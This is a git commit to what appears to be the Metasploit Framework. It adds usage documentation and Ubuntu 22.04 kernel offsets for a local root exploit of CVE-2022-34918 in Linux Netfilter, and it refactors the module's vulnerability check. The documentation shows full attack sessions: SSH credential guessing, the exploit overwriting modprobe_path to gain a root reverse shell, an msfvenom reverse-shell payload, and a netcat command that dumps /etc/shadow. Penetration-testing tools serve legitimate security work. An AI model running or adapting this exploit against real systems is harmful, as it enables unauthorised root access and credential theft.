Add module docs, add Ubuntu 22.04 offsets, update check method

2024-10-29 18:07:27 +01:00 · 2022-07-22 03:28:42 +02:00 · 2022-07-22 03:28:42 +02:00 · 37f1fdd47b
commit 37f1fdd47b
parent 73db035e57
5 changed files with 176 additions and 29 deletions
--- a/data/exploits/CVE-2022-34918/ubuntu.elf
+++ b/data/exploits/CVE-2022-34918/ubuntu.elf
--- a/documentation/modules/exploit/linux/local/netfilter_nft_set_elem_init_privesc.md
+++ b/documentation/modules/exploit/linux/local/netfilter_nft_set_elem_init_privesc.md
@ -0,0 +1,149 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Netfilter, the Linux Kernel component
+that implements firewall capabilities in Linux.
+The vulnerability is a type-confusion bug that leads to a heap overflow in kernel memory.
+The exploit relies on spraying, it may fail, or crash the target system.
+
+### Install
+
+The vulnerability exists in linux kernel versions from `5.8-rc1` up to `v5.19-rc5`.
+this module contains offsets for some vulnerable Ubuntu versions.
+
+Install Ubuntu 22.04 LTS with a vulnerable kernel version.
+`apt-get install linux-image-5.15.0-25-generic`
+Hold shift when you reboot and select the proper kernel version
+
+## Verification Steps
+
+1. Make an Ubuntu target.
+1. Create a Meterpreter or shell payload and upload it to the Ubuntu target. Or setup openssh-server, and use the corresponding auxiliary module.
+1. Get a session
+1. Do: `use exploit/linux/local/netfilter_nft_set_elem_init_privesc`
+1. Do: `set session <session_id>`
+1. Do: `set payload <payload>`
+1. Do: `set lhost <ip>`
+1. Do: `set [r|l]port <port>`
+1. Do: `run`
+1. You should get a new session as the `root` user.
+1. If it fails, retry, or reboot Ubuntu and retry.
+
+## Options
+
+### COMPILE
+
+[Auto|True|False] This selects the binary to use. `True` will cause the module to upload the source
+code and perform compilation on target, `False` will cause the module to upload a precompiled binary.
+`Auto` will cause the module to try compiling the exploit on the target but will fall back to the
+precompiled option if a compiler cannot be found.
+
+### WritableDir
+
+This indicates the location where you would like the payload and exploit binary stored.
+The default value is `/tmp`
+
+Due to the exploitation strategy that this module relies on, `/tmp` must be writable, even if
+`WritableDir` is a different directory. `modprobe_path` gets overwritten with a path to a file
+in `/tmp`. This file is a bash script that adds the setuid bit to the payload uploaded at
+`WritableDir`.
+
+## Scenarios
+
+### Ubuntu 21.10 x64 With Linux 5.13.0.37-Generic
+
+```
+msf6 > use auxiliary/scanner/ssh/ssh_login
+msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.40
+rhosts => 192.168.0.40
+msf6 auxiliary(scanner/ssh/ssh_login) > set username redouane
+username => redouane
+msf6 auxiliary(scanner/ssh/ssh_login) > set password user
+password => user
+msf6 auxiliary(scanner/ssh/ssh_login) > run
+
+[*] 192.168.0.40:22 - Starting bruteforce
+[+] 192.168.0.40:22 - Success: 'redouane:user' 'uid=1000(redouane) gid=1000(redouane) groupes=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux hopeful-zhukovky 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux '
+[*] SSH session 1 opened (192.168.0.32:46499 -> 192.168.0.40:22) at 2022-07-22 02:44:56 +0200
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/netfilter_nft_set_elem_init_privesc
+[*] Using configured payload linux/x64/shell_reverse_tcp
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set lhost wlan0
+lhost => wlan0
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 1
+session => 1
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: 
+[*] Started reverse TCP handler on 192.168.0.32:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Dropping pre-compiled binaries to system...
+[*] Writing '/tmp/z9G2XJ' (761240 bytes) ...
+[*] Uploading payload...
+[*] Writing '/tmp/AsfKz' (248 bytes) ...
+[*] Running payload on remote system...
+[+] Deleted /tmp/z9G2XJ
+[+] Deleted /tmp/AsfKz
+[*] Command shell session 2 opened (192.168.0.32:4444 -> 192.168.0.40:35956) at 2022-07-22 02:45:54 +0200
+
+id
+[*] Payload executed! If it was successful, a session should have been created
+
+uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
+```
+
+## Notes
+
+### Included Binaries
+The binary used by this exploit `data/exploits/CVE-2022-34918/ubuntu.elf` can be used separately from
+Metasploit. The binary takes a single argument which is the payload or executable you wish to launch as `root`.
+
+The exploit adds the setuid bit to the payload, the path given must be absolute, avoid binaries that don't run
+when the setuid bit is detected.
+
+Also, the exploit process forks, gets its child to execute the setuid payload binary, and exits
+(it doesn't call `wait` or `waitpid`). For this reason, don't expect the binary to read input from standard input.
+
+The following snippet shows an example of how one might run a payload to get
+a new Bash shell as the `root` user.
+
+```
+redouane@wizardly-maxwell:~$ id
+uid=1000(redouane) gid=1000(redouane) groups=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare)
+redouane@wizardly-maxwell:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 PrependSetresuid=true PrependSetresgid=true -f elf -o payload
+[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
+[-] No arch selected, selecting arch: x64 from the payload
+No encoder specified, outputting raw payload
+Payload size: 96 bytes
+Final size of elf file: 216 bytes
+Saved as: payload
+redouane@wizardly-maxwell:~$ chmod +x payload
+redouane@wizardly-maxwell:~$ (echo id; head -n 2 /etc/shadow) | nc -lvvp1337 &
+[1] 2272
+redouane@wizardly-maxwell:~$ Listening on 0.0.0.0 1337
+
+redouane@wizardly-maxwell:~$ ./ubuntu.elf /home/redouane/payload
+[+] kernel version '5.15.0-25-generic #25-Ubuntu' detected
+[+] Second process currently waiting
+[+] Get CAP_NET_ADMIN capability
+[+] Netlink socket created
+[+] Netlink socket bound
+[+] Table table created
+[+] Set for the leak created
+[+] Set for write primitive created
+[*] Leak in process
+[+] Leak succeed
+[+] kaslr base found 0xffffffff9f000000
+[+] physmap base found 0xffff910a00000000
+[+] modprobe path changed !
+[+] Modprobe payload setup
+[?] waitpid
+[?] sem_post
+[+++] Got root shell, should exit?
+Connection received on localhost 56962
+uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
+root:!:19193:0:99999:7:::
+daemon:*:19101:0:99999:7:::
+```
--- a/external/source/exploits/CVE-2022-34918/Makefile
+++ b/external/source/exploits/CVE-2022-34918/Makefile
@ -26,5 +26,5 @@ obj:
 	mkdir obj

 clean:
-	rm -rf obj/*.o
+	rm -rf obj
 	rm -f $(TARGET)
--- a/external/source/exploits/CVE-2022-34918/src/util.c
+++ b/external/source/exploits/CVE-2022-34918/src/util.c
@ -13,9 +13,24 @@

 struct kernel_info kernels[] = {
 // 22.04 LTS
-	{ "5.15.0-39-generic #42-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 },
-	{ "5.15.0-40-generic #43-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 },
-	{ "5.15.0-25-generic #25-Ubuntu", 0x3dda20, 0x3de520, 0x1e8b3a0 },
+    { "5.15.0-24-lowlatency #24-Ubuntu", 0x3e68a0, 0x3e7690, 0x1e8c320 },
+    { "5.15.0-25-generic #25-Ubuntu", 0x3dda20, 0x3de520, 0x1e8b3a0 },
+    { "5.15.0-27-generic #28-Ubuntu", 0x3ddaf0, 0x3de5f0, 0x1e8b320 },
+    { "5.15.0-27-lowlatency #28-Ubuntu", 0x3e6970, 0x3e7760, 0x1e8c2a0 },
+    { "5.15.0-30-generic #31-Ubuntu", 0x3dea40, 0x3df540, 0x1e8b460 },
+    { "5.15.0-30-lowlatency #31-Ubuntu", 0x3e78b0, 0x3e86a0, 0x1e8c3e0 },
+    { "5.15.0-33-generic #34-Ubuntu", 0x3dea40, 0x3df540, 0x1e8b460 },
+    { "5.15.0-33-lowlatency #34-Ubuntu", 0x3e78c0, 0x3e86b0, 0x1e8c3e0 },
+    { "5.15.0-35-generic #36-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b560 },
+    { "5.15.0-35-lowlatency #36-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c4e0 },
+    { "5.15.0-37-generic #39-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b560 },
+    { "5.15.0-37-lowlatency #39-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c4e0 },
+    { "5.15.0-39-generic #42-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 },
+    { "5.15.0-39-lowlatency #42-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c5a0 },
+    { "5.15.0-40-generic #43-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 },
+    { "5.15.0-40-lowlatency #43-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c5a0 },
+    { "5.15.0-41-generic #44-Ubuntu", 0x3e00a0, 0x3e0b90, 0x1e8b660 },
+    { "5.15.0-41-lowlatency #44-Ubuntu", 0x3e8f70, 0x3e9d50, 0x1e8c5e0 },
 // Ubuntu 20.04.4 LTS
    { "5.11.0-41-generic #45~20.04.1-Ubuntu", 0x37db60, 0x389a80, 0x1c6c2e0 },
    { "5.11.0-44-generic #48~20.04.2-Ubuntu", 0x37de70, 0x389a90, 0x1c6c2e0 },
--- a/modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb
+++ b/modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb
@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
  def run_payload
    info = cmd_exec(@executable_path, @payload_path)
    info.each_line do |line|
-      print_status(line)
+      print_status(line.chomp)
    end
    print_status('Payload executed! If it was successful, a session should have been created')
  end
@ -106,35 +106,18 @@ class MetasploitModule < Msf::Exploit::Local

  def check
    config = kernel_config
-    if config.nil?
-      vprint_error 'Could not retrieve kernel config'
-      return CheckCode::Unknown
-    end

-    unless config.include? 'CONFIG_USER_NS=y'
-      vprint_error 'Kernel config does not include CONFIG_USER_NS'
-      return CheckCode::Safe
-    end
-    vprint_good 'Kernel config has CONFIG_USER_NS enabled'
+    return CheckCode::Unknown('Could not retrieve kernel config') if config.nil?

-    unless userns_enabled?
-      vprint_error 'Unprivileged user namespaces are not permitted'
-      return CheckCode::Safe
-    end
-    vprint_good 'Unprivileged user namespaces are permitted'
+    return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y')

-    if lkrg_installed?
-      vprint_error 'LKRG is installed'
-      return CheckCode::Safe
-    end
-    vprint_good 'LKRG is not installed'
+    return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled?
+
+    return CheckCode::Safe('LKRG is installed') if lkrg_installed?

    arch = kernel_hardware
-    unless arch.include? 'x86_64'
-      vprint_error "System architecture #{arch} is not supported"
-      return CheckCode::Safe
-    end
-    vprint_good "System architecture #{arch} is supported"
+
+    return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64')

    release = kernel_release
    version = "#{release} #{kernel_version.split(' ').first}"